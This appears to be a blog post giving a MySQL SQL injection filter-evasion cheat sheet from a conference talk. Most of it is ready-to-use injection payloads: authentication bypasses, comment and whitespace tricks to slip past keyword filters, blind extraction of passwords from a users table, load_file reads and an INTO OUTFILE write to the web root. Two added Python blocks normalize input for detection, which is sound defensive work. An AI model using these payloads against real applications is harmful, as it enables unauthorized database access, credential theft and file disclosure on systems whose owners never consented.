SQLi Filter Evasion cheat sheet (MySQL)


This week I presented my experiences with SQLi filter evasion techniques, gained during 3 years of PHPIDS filter evasion, at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheat sheet. A more detailed explanation can be found in the slides or in the talk (the video should come online in a few weeks).

Basic Filter

Comments
' or 1=1#
' or 1=1-- -
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select as '
' or#newline
1='1
' or-- -newline
1='1
'/*!50000or*/1='1
'/*!or*/1='1

Prefixes
+ - ~ !
' or--+2=--!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
' or+(1)sounds/**/like "1"--%a0-
' union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT N'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
' or true='1 # or 1=1
' or round(pi(),1)+true+true=version() # or 3.1+1+1=5.1
' or '1 # or true

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

Authentication Bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication Bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users

Function Filter

General function filtering
ascii (97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'abc' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
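A filter that looks for literal strings such as table names or file paths is blind to the quote-free encodings listed under "Strings with quotes", "Strings without quotes" and "Strings with functions" above. As an added example that is not part of the original cheat sheet, the Python below folds the encodings MySQL accepts as string literals or string-producing calls (0x hex literals, x'..' and b'..' literals, UNHEX() and CHAR()) back into plain quoted strings, so that a detection rule matches on the decoded value rather than on the bytes the attacker chose. `fold_literals` and `reveals` are names I chose; leaving multi-byte CHAR() values and odd-length hex untouched is a deliberate simplification, and the sample lines are copied from the sheet.

```python
import re


def _quote(text: str) -> str:
    """Render a decoded value as a plain single-quoted SQL literal."""
    return "'" + text.replace("'", "''") + "'"


def _from_hex(m) -> str:
    """0x616263, x'616263', UNHEX(616263) -> 'abc'. Odd-length hex is left as is
    (MySQL returns NULL or a number there, never a string)."""
    digits = m.group(1)
    if len(digits) % 2:
        return m.group(0)
    return _quote(bytes.fromhex(digits).decode("latin-1"))


def _from_bits(m) -> str:
    """b'1100001' -> 'a': the bit string is packed big-endian into whole bytes."""
    bits = m.group(1)
    n = (len(bits) + 7) // 8
    return _quote(int(bits, 2).to_bytes(n, "big").decode("latin-1"))


def _from_char(m) -> str:
    """CHAR(97,98,99) -> 'abc'. Values above 255 would be multi-byte; leave those."""
    codes = [int(c) for c in m.group(1).split(",")]
    if any(c > 255 for c in codes):
        return m.group(0)
    return _quote(bytes(codes).decode("latin-1"))


# (pattern, decoder) pairs applied left to right in a single pass.
FOLDERS = [
    (re.compile(r"\bunhex\(\s*'?([0-9a-f]+)'?\s*\)", re.I), _from_hex),
    (re.compile(r"\bchar\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I), _from_char),
    (re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I), _from_hex),
    (re.compile(r"\bx'((?:[0-9a-f]{2})*)'", re.I), _from_hex),
    (re.compile(r"\bb'([01]+)'", re.I), _from_bits),
]


def fold_literals(sql: str) -> str:
    """Rewrite every alternate string encoding in `sql` as a normal quoted literal."""
    for pattern, decoder in FOLDERS:
        sql = pattern.sub(decoder, sql)
    return sql


def reveals(sql: str, needle: str) -> bool:
    """True when `needle` is present once the alternate encodings are folded."""
    return needle.lower() in fold_literals(sql).lower()


if __name__ == "__main__":
    # Constructed inputs: the encodings listed on the sheet, plus one computed string
    # (CONCAT of CONV calls) that this folder deliberately does not evaluate.
    for line in [
        "'abc' = 0x616263",
        "'abc' = unhex(616263)",
        "'abc' = char(97,98,99)",
        "SELECT x'61'",
        "SELECT b'1100001'",
        "load_file/*foo*/(0x616263)",
        "'abc' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))",
    ]:
        print(f"{line:65} -> {fold_literals(line)}")
```

Computed strings such as the CONCAT(CONV(...)) form are not folded, which is the general lesson: folding literal encodings narrows the gap a signature has to cover, but it cannot close it, so it belongs in logging and detection rather than standing in for parameterized queries.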

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{? " ^cxhééea
des_encrypt // ' Gò/ïök
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer Representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr('abc',1,1)='a'
substr('abc' from 1 for 1)='a'
substring('abc',1,1)='a'
substring('abc' from 1 for 1)='a'
mid('abc',1,1)='a'
mid('abc' from 1 for 1)='a'
lpad('abc',1,space(1))='a'
rpad('abc',1,space(1))='a'
left('abc',1)='a'
reverse(right(reverse('abc'),1))='a'
insert(insert('abc',1,0,space(0)),2,222,space(0))='a'
space(0)=trim(version()from(version()))

Search substrings
locate('a','abc')
position('a','abc')
position('a' in 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' from 'abc'))
length(replace('abc','a',''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
Length ()
Bit_length ()
Char_length ()
Octet_length ()
Bit_count ()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')

Keyword Filter

Connected keyword Filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)....
0'union all select`table_name`foo from`information_schema`.`tables`
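The comment, whitespace and connected-keyword tricks (the "Comments" and "Whitespaces" lists near the top and the "Connected keyword filtering" lines just above) all exploit the gap between the bytes a filter inspects and the token stream MySQL's lexer actually sees. As an added example that is not part of the original cheat sheet, the Python below canonicalizes a URL-encoded parameter the way a detection layer should before matching: it decodes percent-encoding, unwraps executable /*!...*/ version comments (the server runs their body), turns ordinary comments and the alternative whitespace bytes into single spaces, and cuts # and -- line comments. A literal substring blacklist (`naive_match`) is run on the raw value beside a keyword check on the canonical form (`canonical_match`); the function names, the three rules and the benign inputs are my own choices, and the payload inputs are copied from the sheet.

```python
import re
from urllib.parse import unquote

# Bytes MySQL's lexer accepts as token separators (the %20 %09 %0a %0b %0c %0d %a0
# list on the sheet); the empty comment /**/ is handled with the other comments.
MYSQL_WS = "\x20\x09\x0a\x0b\x0c\x0d\xa0"
WS_CLASS = "[" + MYSQL_WS + "]"

# Order matters: executable version comments are unwrapped first, then ordinary
# block comments become whitespace, then line comments are cut to end of line.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
HASH_COMMENT = re.compile(r"#[^\n]*")
DASH_COMMENT = re.compile(r"--" + WS_CLASS + r"[^\n]*")   # "-- " needs a separator
WS_RUN = re.compile(WS_CLASS + "+")


def canonicalize(raw: str) -> str:
    """Return the lower-cased token stream MySQL would see for a URL-encoded value."""
    s = unquote(raw, encoding="latin-1")   # %a0 must decode to a byte, not fail as UTF-8
    s = VERSION_COMMENT.sub(r" \1 ", s)
    s = BLOCK_COMMENT.sub(" ", s)
    s = HASH_COMMENT.sub(" ", s)
    s = DASH_COMMENT.sub(" ", s)
    return WS_RUN.sub(" ", s).strip().lower()


# Signature rules that are only meaningful on the canonical form.
RULES = [
    # UNION [ALL] SELECT, with parentheses allowed as the only separator
    re.compile(r"\bunion\b[\s(]*(?:all\s+)?select\b"),
    # OR/AND/||/&& followed by a numeric or boolean tautology, e.g. or 1='1
    re.compile(r"(?:\b(?:or|and)\b|\|\||&&)\s*\(?\s*(?:\d+|true)\s*\)?\s*=\s*'?\s*(?:\d+|true)\b"),
    # boolean connector followed by one of the alternative comparison operators
    re.compile(r"\b(?:or|and)\b[^\n]*\b(?:sounds like|rlike|regexp)\b"),
]

NAIVE_BLACKLIST = ("union select", "or 1=1")


def naive_match(raw: str) -> bool:
    """Substring blacklist on the raw parameter: the kind of filter the sheet defeats."""
    low = raw.lower()
    return any(term in low for term in NAIVE_BLACKLIST)


def canonical_match(raw: str) -> bool:
    """The same idea applied to the canonical token stream."""
    canon = canonicalize(raw)
    return any(rule.search(canon) for rule in RULES)


if __name__ == "__main__":
    # Constructed inputs: payloads copied from the sheet plus two benign values.
    samples = [
        "' or 1=1-- -",
        "'/*!50000or*/1='1",
        "' or+(1)sounds/**/like \"1\"--%a0-",
        "0/**/union/*!50000select*/table_name`foo`/**/...",
        "0%A0UNION%A0SELECT%09GROUP_CONCAT(table_name)....",
        "O'Reilly",
        "rock and roll",
    ]
    for s in samples:
        print(f"{s!r:55} naive={naive_match(s)!s:5} canonical={canonical_match(s)!s:5} -> {canonicalize(s)!r}")
```

The point is not that the three rules make a good filter (they do not: canonicalization only narrows the gap, and the function-based, typecasting and gadget tricks further down the sheet still pass them), but that any keyword or signature logic applied before canonicalization is measuring the wrong string. Parameterized queries remain the control; this normalization belongs in logging and detection.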

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id=1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id=1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),[+])='a
'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()#
'-if(name='admin',1,0)#
'-if(if(name='admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control Flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)

If you have any other useful tricks I forgot to list here, leave a comment.
